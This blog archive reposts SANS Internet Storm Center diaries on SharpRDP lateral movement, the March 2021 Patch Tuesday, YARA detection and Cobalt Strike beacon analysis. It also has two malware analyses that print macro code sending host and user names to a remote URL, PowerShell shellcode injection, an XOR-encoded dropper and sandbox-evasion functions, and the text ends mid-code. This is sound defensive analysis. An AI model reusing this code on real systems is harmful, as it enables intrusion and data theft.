Blog

Archive for March, 2021

SharpRDP – PSExec without PSExec, PSRemoting without PowerShell, (Wed, Mar 10th)

With the amount of remediation folks have these days to catch malicious execution of powershell or the use of tools like psexec, red teams have to be asking themselves – what approach is next for lateral movement after you get that first foothold?

For me, if the easy stuff isn’t an option, SharpRDP makes a pretty easy “next tool on the shelf”

SharpRDP takes advantage of the fact that Microsoft took a lot of pages from the Citrix ICA protocol when they put the RDP protocol together.  RDP isn’t just for remote desktop – it implements “channels” which can be used for all sorts of things.  In the past, the most common use of channels in ICA is to differentiate printer traffic from interactive traffic, and apply different QOS policies to it.  But SharpRDP takes it to the next level, and allows you to start a session, and instruct it to execute code after it starts!

For the red team, this has oodles of attraction – often you don’t have a GUI, and this lets you run pretty much anything you want on a remote host over a traditionally “GUI” protocol.  Since it’s in an RDP session, it’s an actual terminal session (not a shell), so all of your inputs and outputs are handled correctly.  While you could theoretically run a CLI terminal session over this, I’m not sure that this is implemented – I haven’t needed to figure that piece out yet if it is.  

For someone on the blue team, this is a tough thing to catch – it’s going to look like any other RDP session that your admins might make, executing “something” after it starts.  

What does a session look like?  It’s as simple as:

>SharpRDP.exe computername=targetservername command=”” username=> password=
[+] Connected to          :  targetservername
[+] Execution priv type   :  non-elevated
[+] Executing
[+] Disconnecting from    :  targetservername
[+] Connection closed     :  targetservername

Normally I’ll have the “command” be a CMD file that does whatever I’m trying to accomplish – usually it’s data collection of some kind, with the data coming back to the host that I have my foot-hold on.  Remember that if your command is not an actual executable (for instance, “dir” is not an executable file. it’s part of cmd.exe), you will have to use “c:windowssystem32cmd.exe /c” to load the cmd interpreter prior to executing your “thing”.

My go-to is single letter CMD files, so for instance t.cmd.  This file is usually homed on my foot-hold server, and sends the data back to a share on that same server.  Also the output normally has %COMPUTERNAME% in the filename so I can keep the files straight (and not have name collisions).

Protections?  LAPS is a good one – if every target host has a different password, you’ll have to collect all of that first before you can use SharpRDP.  (https://isc.sans.edu/forums/diary/Microsoft+LAPS+Blue+Team+Red+Team/24528/).  Really though if an attacker is far enough in to fire up RDP sessions to arbitrary hosts, harvesting the LAPS passwords isn’t too tough, once you figure out that LAPS is in play.  MFA on RDP sessions is really your best bet.  I’ve got a few clients running this, and it’s pretty slick.  Most MFA solutions allow you to extend RDP authentication, usually it’s a “click OK” or a biometric confirmation (Face-ID usually) on your phone to complete the RDP session.

If you’ve got MFA on your servers for RDP access, then SharpRDP use is defeated nicely, and your detection that you can code into your SIEM is whatever event is generated by “failed MFA on RDP”.  Your next-level protection in that case is “alert on any new registration of MFA users”.  You’ll want any registration of new users, or registration of new phones to existing users to go to a number of people – once MFA is a main protection, it also of course becomes a main target.

All that being said, MFA on RDP is not widely implemented in March of 2021 – there are a lot of people working on fixing this though.  The uptick in migrating VPN’s and Citrix Gateways to newer MFA solutions means that it’s becoming much easier to extend MFA to more and more platforms, and RDP is one of the easier and more impactful ones that we see picked.

SharpRDP is homed here:
https://github.com/0xthirteen/SharpRDP
And has a full write-up here:
https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3

 

===============
Rob VandenBrink
[email protected]

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Microsoft March 2021 Patch Tuesday, (Tue, Mar 9th)

This month we got patches for 122 vulnerabilities. Of these, 14 are critical, 5 are being exploited and 2 were previously disclosed. 

The highlight for this month goes to the Microsoft Exchange Server vulnerabilities that are being exploited and for which Microsoft has made available the emergency patches on March 2. If you have this software in your environment, especially if the service is exposed to the internet, and did not apply the patches, in addition to apply the patches, it is imperative that you check if your system could have been already compromised. Johannes published a diary summarizing the vulnerabilities and giving advices on how to check for evidence of compromise.

In addition to the 4 Microsoft Exchange Server vulnerabilities, there is a fifth vulnerability being exploited which have been previously disclosed. This is a RCE affecting Microsoft Edge and Internet Explorer 11 (CVE-2021-26411) on multiple Windows versions. According to the vulnerability advisory, to exploit this vulnerability, an attacker would have to convince a user to access a malicious website, like in a phishing scenario. The exploit is publicly disclosed, and exploitations were already detected. 

The highest CVSS score this month (9.90) was given to the Windows Hyper-V Remote Code Execution Vulnerability (CVE-2021-26867). The vulnerability advisory says that any Hyper-V client which is configured to use the Plan 9 file system could be vulnerable. An authenticated attacker who successfully exploited this vulnerability on a Hyper-V client could cause code to execute on the Hyper-V server.

And for the second month in a row, there is a critical RCE vulnerability affecting Windows DNS Server (CVE-2021-26897) with a CVSS of 9.80. According to the advisory, the vulnerability affects any DNS Server – being it a standalone DNS Primary Authoritative Server or a DNS Server integrated with Active Directory. It also informs that to be vulnerable, a DNS server would need to have dynamic updates enabled. 

See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com

Description
CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
Application Virtualization Remote Code Execution Vulnerability
%%cve:2021-26890%% No No Less Likely Less Likely Important 7.8 6.8
Azure Sphere Unsigned Code Execution Vulnerability
%%cve:2021-27074%% No No Less Likely Less Likely Critical 6.2 5.6
%%cve:2021-27080%% No No Less Likely Less Likely Critical 9.3 9.3
Azure Virtual Machine Information Disclosure Vulnerability
%%cve:2021-27075%% No No Less Likely Less Likely Important 6.8 6.1
Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG
%%cve:2020-27844%% No No    
Chromium CVE-2021-21159: Heap buffer overflow in TabStrip
%%cve:2021-21159%% No No    
Chromium CVE-2021-21160: Heap buffer overflow in WebAudio
%%cve:2021-21160%% No No    
Chromium CVE-2021-21161: Heap buffer overflow in TabStrip
%%cve:2021-21161%% No No    
Chromium CVE-2021-21162: Use after free in WebRTC
%%cve:2021-21162%% No No    
Chromium CVE-2021-21163: Insufficient data validation in Reader Mode
%%cve:2021-21163%% No No    
Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS
%%cve:2021-21164%% No No    
Chromium CVE-2021-21165: Object lifecycle issue in audio
%%cve:2021-21165%% No No    
Chromium CVE-2021-21166: Object lifecycle issue in audio
%%cve:2021-21166%% No No    
Chromium CVE-2021-21167: Use after free in bookmarks
%%cve:2021-21167%% No No    
Chromium CVE-2021-21168: Insufficient policy enforcement in appcache
%%cve:2021-21168%% No No    
Chromium CVE-2021-21169: Out of bounds memory access in V8
%%cve:2021-21169%% No No    
Chromium CVE-2021-21170: Incorrect security UI in Loader
%%cve:2021-21170%% No No    
Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation
%%cve:2021-21171%% No No    
Chromium CVE-2021-21172: Insufficient policy enforcement in File System API
%%cve:2021-21172%% No No    
Chromium CVE-2021-21173: Side-channel information leakage in Network Internals
%%cve:2021-21173%% No No    
Chromium CVE-2021-21174: Inappropriate implementation in Referrer
%%cve:2021-21174%% No No    
Chromium CVE-2021-21175: Inappropriate implementation in Site isolation
%%cve:2021-21175%% No No    
Chromium CVE-2021-21176: Inappropriate implementation in full screen mode
%%cve:2021-21176%% No No    
Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill
%%cve:2021-21177%% No No    
Chromium CVE-2021-21178 : Inappropriate implementation in Compositing
%%cve:2021-21178%% No No    
Chromium CVE-2021-21179: Use after free in Network Internals
%%cve:2021-21179%% No No    
Chromium CVE-2021-21180: Use after free in tab search
%%cve:2021-21180%% No No    
Chromium CVE-2021-21181: Side-channel information leakage in autofill
%%cve:2021-21181%% No No    
Chromium CVE-2021-21182: Insufficient policy enforcement in navigations
%%cve:2021-21182%% No No    
Chromium CVE-2021-21183: Inappropriate implementation in performance APIs
%%cve:2021-21183%% No No    
Chromium CVE-2021-21184: Inappropriate implementation in performance APIs
%%cve:2021-21184%% No No    
Chromium CVE-2021-21185: Insufficient policy enforcement in extensions
%%cve:2021-21185%% No No    
Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning
%%cve:2021-21186%% No No    
Chromium CVE-2021-21187: Insufficient data validation in URL formatting
%%cve:2021-21187%% No No    
Chromium CVE-2021-21188: Use after free in Blink
%%cve:2021-21188%% No No    
Chromium CVE-2021-21189: Insufficient policy enforcement in payments
%%cve:2021-21189%% No No    
Chromium CVE-2021-21190 : Uninitialized Use in PDFium
%%cve:2021-21190%% No No    
DirectX Elevation of Privilege Vulnerability
%%cve:2021-24095%% No No More Likely More Likely Important 7.0 6.1
Git for Visual Studio Remote Code Execution Vulnerability
%%cve:2021-21300%% No No Less Likely Less Likely Critical 8.8 7.7
HEVC Video Extensions Remote Code Execution Vulnerability
%%cve:2021-24089%% No No Less Likely Less Likely Critical 7.8 6.8
%%cve:2021-24110%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-26902%% No No Less Likely Less Likely Critical 7.8 6.8
%%cve:2021-27047%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-27048%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-27049%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-27050%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-27051%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-27061%% No No Less Likely Less Likely Critical 7.8 6.8
%%cve:2021-27062%% No No Less Likely Less Likely Important 7.8 6.8
Internet Explorer Memory Corruption Vulnerability
%%cve:2021-26411%% Yes Yes Detected Detected Critical 8.8 7.9
Internet Explorer Remote Code Execution Vulnerability
%%cve:2021-27085%% No No Less Likely Less Likely Important 8.8 7.9
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2021-27053%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-27054%% No No Less Likely Less Likely Important 7.8 6.8
Microsoft Exchange Server Remote Code Execution Vulnerability
%%cve:2021-26412%% No No Less Likely Less Likely Critical 9.1 8.2
%%cve:2021-26854%% No No Less Likely Less Likely Important 6.6 5.8
%%cve:2021-26855%% No Yes Detected Detected Critical 9.1 8.4
%%cve:2021-26857%% No Yes More Likely Detected Critical 7.8 7.2
%%cve:2021-26858%% No Yes Detected Detected Important 7.8 7.2
%%cve:2021-27065%% No Yes Detected Detected Critical 7.8 7.2
%%cve:2021-27078%% No No Less Likely Less Likely Important 9.1 8.2
Microsoft Office ClickToRun Remote Code Execution Vulnerability
%%cve:2021-27058%% No No Less Likely Less Likely Important 7.8 6.8
Microsoft Office Remote Code Execution Vulnerability
%%cve:2021-24108%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-27057%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-27059%% No No Less Likely Less Likely Important 7.6 6.6
Microsoft Power BI Information Disclosure Vulnerability
%%cve:2021-26859%% No No Less Likely Less Likely Important 7.7 6.7
Microsoft PowerPoint Remote Code Execution Vulnerability
%%cve:2021-27056%% No No Less Likely Less Likely Important 7.8 6.8
Microsoft SharePoint Server Information Disclosure Vulnerability
%%cve:2021-27052%% No No Less Likely Less Likely Important 5.3 4.8
Microsoft SharePoint Server Remote Code Execution Vulnerability
%%cve:2021-27076%% No No More Likely More Likely Important 8.8 7.7
Microsoft SharePoint Spoofing Vulnerability
%%cve:2021-24104%% No No Less Likely Less Likely Important 4.6 4.2
Microsoft Visio Security Feature Bypass Vulnerability
%%cve:2021-27055%% No No Less Likely Less Likely Important 7.0 6.1
Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability
%%cve:2021-26887%% No No Less Likely Less Likely Important 7.8 6.8
Microsoft Windows Media Foundation Remote Code Execution Vulnerability
%%cve:2021-26881%% No No Less Likely Less Likely Important 7.5 6.5
OpenType Font Parsing Remote Code Execution Vulnerability
%%cve:2021-26876%% No No Less Likely Less Likely Critical 8.8 7.7
Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability
%%cve:2021-27082%% No No Important 7.8 6.8
Remote Access API Elevation of Privilege Vulnerability
%%cve:2021-26882%% No No Less Likely Less Likely Important 7.8 6.8
Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability
%%cve:2021-27083%% No No Less Likely Less Likely Important 7.8 6.8
Storage Spaces Controller Elevation of Privilege Vulnerability
%%cve:2021-26880%% No No Less Likely Less Likely Important 7.8 6.8
User Profile Service Denial of Service Vulnerability
%%cve:2021-26886%% No No Less Likely Less Likely Important 5.5 4.8
Visual Studio Code ESLint Extension Remote Code Execution Vulnerability
%%cve:2021-27081%% No No Less Likely Less Likely Important 7.8 6.8
Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability
%%cve:2021-27084%% No No Less Likely Less Likely Important    
Visual Studio Code Remote Code Execution Vulnerability
%%cve:2021-27060%% No No Less Likely Less Likely Important 7.8 6.8
Windows 10 Update Assistant Elevation of Privilege Vulnerability
%%cve:2021-27070%% No No Less Likely Less Likely Important 7.3 6.4
Windows ActiveX Installer Service Information Disclosure Vulnerability
%%cve:2021-26869%% No No Less Likely Less Likely Important 5.5 4.8
Windows Admin Center Security Feature Bypass Vulnerability
%%cve:2021-27066%% No No Less Likely Less Likely Important 4.3 3.8
Windows App-V Overlay Filter Elevation of Privilege Vulnerability
%%cve:2021-26860%% No No Less Likely Less Likely Important 7.8 6.8
Windows Container Execution Agent Elevation of Privilege Vulnerability
%%cve:2021-26865%% No No Less Likely Less Likely Important 8.8 7.7
%%cve:2021-26891%% No No Less Likely Less Likely Important 7.8 6.8
Windows DNS Server Denial of Service Vulnerability
%%cve:2021-26896%% No No Less Likely Less Likely Important 7.5 6.5
%%cve:2021-27063%% No No Less Likely Less Likely Important 7.5 6.5
Windows DNS Server Remote Code Execution Vulnerability
%%cve:2021-26877%% No No More Likely More Likely Important 9.8 8.5
%%cve:2021-26893%% No No Less Likely Less Likely Important 9.8 8.5
%%cve:2021-26894%% No No Less Likely Less Likely Important 9.8 8.5
%%cve:2021-26895%% No No Less Likely Less Likely Important 9.8 8.5
%%cve:2021-26897%% No No More Likely More Likely Critical 9.8 8.5
Windows Error Reporting Elevation of Privilege Vulnerability
%%cve:2021-24090%% No No Less Likely Less Likely Important 7.8 6.8
Windows Event Tracing Elevation of Privilege Vulnerability
%%cve:2021-26872%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-26898%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-26901%% No No Less Likely Less Likely Important 7.8 6.8
Windows Event Tracing Information Disclosure Vulnerability
%%cve:2021-24107%% No No Less Likely Less Likely Important 5.5 4.8
Windows Extensible Firmware Interface Security Feature Bypass Vulnerability
%%cve:2021-26892%% No No Less Likely Less Likely Important 6.2 5.6
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2021-26868%% No No More Likely More Likely Important 7.8 6.8
Windows Graphics Component Remote Code Execution Vulnerability
%%cve:2021-26861%% No No Less Likely Less Likely Important 7.8 6.8
Windows Hyper-V Remote Code Execution Vulnerability
%%cve:2021-26867%% No No Less Likely Less Likely Critical 9.9 8.6
Windows Installer Elevation of Privilege Vulnerability
%%cve:2021-26862%% No No Less Likely Less Likely Important 6.3 5.5
Windows Media Photo Codec Information Disclosure Vulnerability
%%cve:2021-26884%% No No Less Likely Less Likely Important 5.5 4.8
Windows NAT Denial of Service Vulnerability
%%cve:2021-26879%% No No Less Likely Less Likely Important 7.5 6.5
Windows Overlay Filter Elevation of Privilege Vulnerability
%%cve:2021-26874%% No No Less Likely Less Likely Important 7.8 6.8
Windows Print Spooler Elevation of Privilege Vulnerability
%%cve:2021-1640%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-26878%% No No Less Likely Less Likely Important 7.8 6.8
Windows Projected File System Elevation of Privilege Vulnerability
%%cve:2021-26870%% No No Less Likely Less Likely Important 7.8 6.8
Windows UPnP Device Host Elevation of Privilege Vulnerability
%%cve:2021-26899%% No No Less Likely Less Likely Important 7.8 6.8
Windows Update Service Elevation of Privilege Vulnerability
%%cve:2021-26866%% No No Less Likely Less Likely Important 7.1 6.2
Windows Update Stack Elevation of Privilege Vulnerability
%%cve:2021-26889%% No No Less Likely Less Likely Important 7.1 6.2
Windows Update Stack Setup Elevation of Privilege Vulnerability
%%cve:2021-1729%% No No Less Likely Less Likely Important 7.1 6.2
Windows User Profile Service Elevation of Privilege Vulnerability
%%cve:2021-26873%% No No Less Likely Less Likely Important 7.0 6.1
Windows Virtual Registry Provider Elevation of Privilege Vulnerability
%%cve:2021-26864%% No No Less Likely Less Likely Important 8.4 7.3
Windows WalletService Elevation of Privilege Vulnerability
%%cve:2021-26871%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-26885%% No No Less Likely Less Likely Important 7.8 6.8
Windows Win32k Elevation of Privilege Vulnerability
%%cve:2021-27077%% Yes No Less Likely Less Likely Important 7.8 7.0
%%cve:2021-26863%% No No More Likely More Likely Important 7.0 6.1
%%cve:2021-26875%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2021-26900%% No No Less Likely Less Likely Important 7.8 6.8


Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

YARA and CyberChef, (Mon, Mar 8th)

If you prefer a graphical user interface to match YARA rules, you can try CyberChef.

YARA is a pattern matching tool, known as “The pattern matching swiss knife”.

CyberChef is a web app for all kinds of (file) analysis techniques, known as “The Cyber Swiss Army Knife”.

And what do you get when you combine 2 Swiss Knifes? One really big Swiss Knife 🙂

CyberChef supports YARA rules.

Here I added one YARA rule to detect Office files with VBA macros. More precisely: ole files that contain the premise of a compressed, default VBA source code header.

YARA rules that match the input (a Word document, .doc,  with VBA code in this example) are listed in the output.

Since CyberChef also has an unzip function, you can apply YARA rules on the files contained in a ZIP file (something the YARA tool itself can not do):

If you want to copy the recipes, they are below.

Just YARA:

https://gchq.github.io/CyberChef/#recipe=YARA_Rules(‘rule%20ole_vba%20%7B%5Cn%20%20%20%20strings:%5Cn%20%20%20%20%20%20%20%20$a%20%3D%20%22Attribut%5C%5Cx00e%22%5Cn%20%20%20%20condition:%5Cn%20%20%20%20%20%20%20%20$a%20and%20uint32be(0)%20%3D%3D%200xd0cf11e0%5Cn%7D’,false,false,false,false)

UNZIP + YARA:

https://gchq.github.io/CyberChef/#recipe=Unzip(”,false)YARA_Rules(‘rule%20ole_vba%20%7B%5Cn%20%20%20%20strings:%5Cn%20%20%20%20%20%20%20%20$a%20%3D%20%22Attribut%5C%5Cx00e%22%5Cn%20%20%20%20condition:%5Cn%20%20%20%20%20%20%20%20$a%20and%20uint32be(0)%20%3D%3D%200xd0cf11e0%5Cn%7D’,false,false,false,false)

And know I need to close my tabs and let the browser update itself 🙂 .

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

PCAPs and Beacons, (Sun, Mar 7th)

I like taking a closer look at captures files posted by Brad. In his latest diary entry, we have a capture file with Cobalt Strike traffic.

With regular expression “^/….$” I look for URIs that are typical for Cobalt Strike shellcode (and Metasploit too):

Following this HTTP stream, I see data that looks encoded and has some repetitions, so this might be some kind of XOR encoding:

I export this data stream as a file:

Then pass it through my 1768.py Cobalt Strike beacon analysis tool:

And this is indeed the configuration of a beacon.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Spotting the Red Team on VirusTotal!, (Sat, Mar 6th)

Many security researchers like to use the VirusTotal platform. The provided services are amazing: You can immediately have a clear overview of the dangerousness level of a file but… VirusTotal remains a cloud service. It means that, once you uploaded a file to scan it, you have to consider it as “lost” and available to a lot of (good or bad) people! In the SANS FOR610 training (“Reverse Engineering Malware”), we insist on the fact that you should avoid uploading a file to VT!  The best practice is to compute the file hash then search for it to see if someone else already uploaded the same sample. If you’re the first to upload a file, its creator can be notified about the upload and learn that he has been detected. Don’t be fooled: attackers have also access to VirusTotal and monitor activity around their malware! Note that I mention VirusTotal because it is very popular but is not the only service providing repositories of malicious files, they are plenty of alternative services to scan and store malicious files.

Another way to use those online services is to “hunt”. That’s what I’m doing with most of the samples that I analyze in my diaries. If you are working on the defensive side (or in a Blue team), my advice is to keep an eye on data related to your business or organization via OSINT sources). Sometimes, you can find interesting information and stay one step ahead of the attacker or… the Red team you hired to test your infrastructure!

I spotted a nice VBS macro that seems to be related to a Red team exercise. I won’t disclose the hash and the script here because it contains sensitive information:

  • URLs with the domain of the company performing the security assessment
  • Public IP addresses used for reverse shells
  • Internal resources about the targeted infrastructure (apparently, the reconnaissance phase was already completed)

Here are some pieces of interesting code:

The entry point of the macro already discloses some fun:

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
  'php rev shell and others...
  Document_Open2
  ...

Let’s start with some data sent back to the attacker:

Private Sub Document_Open2()
On Error Resume Next
  uID = Environ("COMPUTERNAME") & "B3" & Environ("USERNAME")
  SavePath = Environ("TEMP") & "tempB2" & Int((9999 - 1000 + 1) * Rnd + 1000)
  CanSend = 0
  sendSystemInfo "http://www.xxxxxxxx.com/sp/index.php?id=" & uID, CanSend
  openShell
End Sub

The domain used in the URL (obfuscated) is the domain of the security company performing the tests!

They obfuscate a script in a fake certificate and decode it with certutil.exe (classic TTP):

x = x & "-----BEGIN CERTIFICATE-----"
x = x & "JGxpbmVzID0gaXBjb25maWcgI3NhdmUgb3V0cHV0IG9mIGNvbW1hbmQgdG8gdmFy"
x = x & "aWFibGUgJGxpbmVzDQokbGluZXMgPSAkbGluZXMgKyAoY21kLmV4ZSAvYyBuZXQg"
x = x & "aG9zdG5hbWUpDQokbGluZXMgPSAkbGluZXMgKyAoY21kLmV4ZSAvYyBuZXQgc2hh"
[...Data removed...]
x = x & "ICRsaW5lICsgIi5pbG10LnVzIg0KICAgICRhcnJheSA9ICRhcnJheSArICRsaW5l"
x = x & "ICNhZGQgdGhlIHZhbHVlIHRvIG91ciBhcnJheQ0KfQ0KDQpmb3IgKCRpID0gMDsg"
x = x & "JGkgLWx0ICRhcnJheS5sZW5ndGg7ICRpKyspIHsNCiAgICBwaW5nICRhcnJheVsk"
x = x & "aV0NCn0="
x = x & "-----END CERTIFICATE-----"

objFile.Write x & vbCrLf
objFile.Close
Shell ("cmd /k certutil -decode " & outFile & " " & inFile), vbHide
Shell (Final & inFile), vbHide

The next technique implemented is the exfiltration of data via HTTPS. They perform this with a shellcode injected in a PowerShell threat:

$1 = '$c = ''
[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';
$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$z = 0xbe,0x57,0xed,0x7b,0x36,0xda, [...Data Removed...],0x2e,0xd9,0x1b,0x87,0xf2;
$g = 0x1000;
if ($z.Length -gt 0x1000) {
  $g = $z.Length};
  $x=$w::VirtualAlloc(0,0x1000,$g,0x40);
  for ($i=0;$i -le ($z.Length-1);$i++) {
    $w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};
    $w::CreateThread(0,0,$x,0,0,0);
    for (;;) {
       Start-sleep 60
    };'
  ;
$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));
$2 = "-enc ";
if([IntPtr]::Size -eq 8) {
  $3 = $env:SystemRoot + "syswow64WindowsPowerShellv1.0powershell";
  iex "& $3 $2 $e"
}
else {;
  iex "& powershell $2 $e";
}

Here is the shellcode:

The injected shellcode connects to a Comcast public IP address that, when access manually, implements a redirect to… the website of the company 🙂

[email protected]:/MalwareZoo/20210305$ curl http://x.x.x.x

    window.location.href = "https://xxxxxxxx.com";

To conclude:

  • If you’re a defender, I hope this example demonstrates to you the importance of implementing OSINT techniques to spot attackers and learn what can be in the pipe.
  • If you’re an attacker, well, do not use your corporate domain! Cover your tracks as much as possible and don’t upload your scripts on VirusTotal.

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

From VBS, PowerShell, C Sharp, Process Hollowing to RAT, (Thu, Mar 4th)

VBS files are interesting to deliver malicious content to a victim’s computer because they look like simple text files. I found an interesting sample that behaves like a dropper. But it looks also like Russian dolls seeing all the techniques used to drop a RAT at the end. The file hash is 8697dc74d7c07583f24488926fc6e117975f8a9f014972073d19a5e62d248ead and has a VT score of 12/59[1]. It was delivered by email under the name “Procurement – Attached RFQ 202102.vbs”. If you filter attachments based on the MIME type, this file won’t be detected as suspicious:

[email protected]:/MalwareZoo/20210303$ file *.vbs
Procurement - Attached RFQ 202102.vbs: ASCII text, with very long lines, with CRLF line terminators

When you try to open a .vbs file on a standard Windows system, it is processed by the “Microsoft ® Windows Based Script Host” handlers. Here is the code executed when you open this script:

Private Function vQ(Inp, Key, Mode)
    Dim z, i, Position, cptZahl, orgZahl, keyZahl, cptString
    For i = 1 To lEn(Inp)
        Position = Position + 1
        If Position > lEn(Key) Then Position = 1
        keyZahl = aSc(Mid(Key, Position, 1))
        If Mode Then  
            orgZahl = aSc(Mid(Inp, i, 1))
            cptZahl = orgZahl Xor keyZahl
            cptString = hEx(cptZahl)
            If lEn(cptString)  lEn(Inp)  2 Then Exit For
            cptZahl = CByte("&" & "H" & Mid(Inp, i * 2 - 1, 2))
            orgZahl = cptZahl Xor keyZahl
            z = z & cHR(orgZahl)
        End If
    Next
    vQ = z
End Function

Dim AqUhNbgAqwpMb
AqUhNbgAqwpMb = "31562B0462222C4B781D323A2D1E1D4A2C4C39202E190F14112E3A1E0C432A5A454C1D392A1D1B5127260F22381E3D086E011F012E5B451B3F594B23031B217726535F5863201340205A593D28000E59003C3F173249335C144C493D4B234509370B044D5072585B17233B5F24703426190F7F363A1E2C2609173F552B09244B5C3E6C7D195D23136E015E2C501F0E5A453E314C34493D28331E507B394603242E526226063C291E0C08134726227F447D72334A3C1D3158532D3C4C7E754425390E0D7841200A0F0F03316A26505E3A413119576F141679085C2D5551445420325134502C1C1E5C0B153D131E3E41505D7303180A7F1F1F7D0E2D733E03126F215C7B794641334B58766C1A567E515B78093F0E0A540E7908027F05166B241E681C5379264B... (remaining bytes removed)

Dim SH
SH = cHR(80 + 7) & cHR(100 + 15) & cHR(66 + 1) & cHR(80 + 2) & cHR(110 - 5) & cHR(85 - 5) & cHR(80 + 4) & cHR(40 + 6) & cHR(230 / 2) & cHR(36 * 2) & cHR(60 + 9) & cHR(100 + 8) & cHR(70 + 6)
Set WS = CreateObject(SH)
Set FSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = FSO.CreateTextFile(FSO.GetSpecialFolder(2) + "OS64Bits.PS1", True)
MyFile.WriteLine(rEPlAcE(vQ(AqUhNbgAqwpMb, "p2O)6[.X0sI^{p(@5wAC|/Gh]N{am}3+(rNY3]>UK|/2_YlCUfqK{hZL*.NawX9G>:x.I", False), "%VBS%", wscript.SCRIPTFULLNAME))
MyFile.Close
WS.rUN "POWERSHELL -eXEcUTiONpOLicY rEmOtEsIgNeD -FILE " & FSO.GetSpecialFolder(2) + "OS64Bits.PS1", 0

The payload is stored in AqUhNbgAqwpMb and decoded by the vQ().This function is an XOR-decoder using a muli-bytes key. The decoded payload is dropped on the filesystem (C:UsersAppDataLocalTempOS64Bits.PS1) and executed by PowerShell. This script looks interesting at multiple points.

First, most suspicious strings are obfuscated and binary encoded. Decoding is performed via a specific function:

Function Binary2String([String] $data) {
    $byteList = [System.Collections.Generic.List[Byte]]::new()
    for ($i = 0; $i -lt $data.Length; $i +=8) {
        $byteList.Add([Convert]::ToByte($data.Substring($i, 8), 2))
    }
    return [System.Text.Encoding]::ASCII.GetString($byteList.ToArray())
}

There is a detection mechanism of virtual environments:

Function VirtualMachineDetector() {
    $searcher = (New-Object System.Management.ManagementObjectSearcher(Select * from Win32_ComputerSystem))
    $items = $searcher.Get()
    $Tr = ""
    foreach ($item in $items) {
        [String] $manufacturer = $item["Manufacturer"].ToString().ToLower()
        if (($manufacturer -eq "microsoft corporation" -and 
           $item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) -or 
           $manufacturer.Contains("vmware") -or $item["Model"].ToString() -eq "VirtualBox") {
             $Tr = "True"
        } else {
             $Tr = "False"
        }
     }
     return $Tr
}

Note also the presence of a function to detect Sandboxie[2], another sandbox tool that is easy to spot by tracking the DLL SbieDll.dll:

Function DetectSandboxie() {
    [Int32] $i = ModuleHandle("SbieDll.dll")
    [String] $s = ""
    if ($i -eq 0) {
        $s = "False"
    } else {
        $s = "True"
    }
    return $s
}

 The most interesting function is CodeDom. It invokes the CSharp compiler to compile the next payload:

function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {
    $dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'
    $dictionary.Add(("CompilerVersion"), ("v4.0"))
    $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)
    $CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters
    $CompilerParametres.ReferencedAssemblies.Add(("System.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("System.Management.dll))
    $CompilerParametres.ReferencedAssemblies.Add(("System.Windows.Forms.dll"))
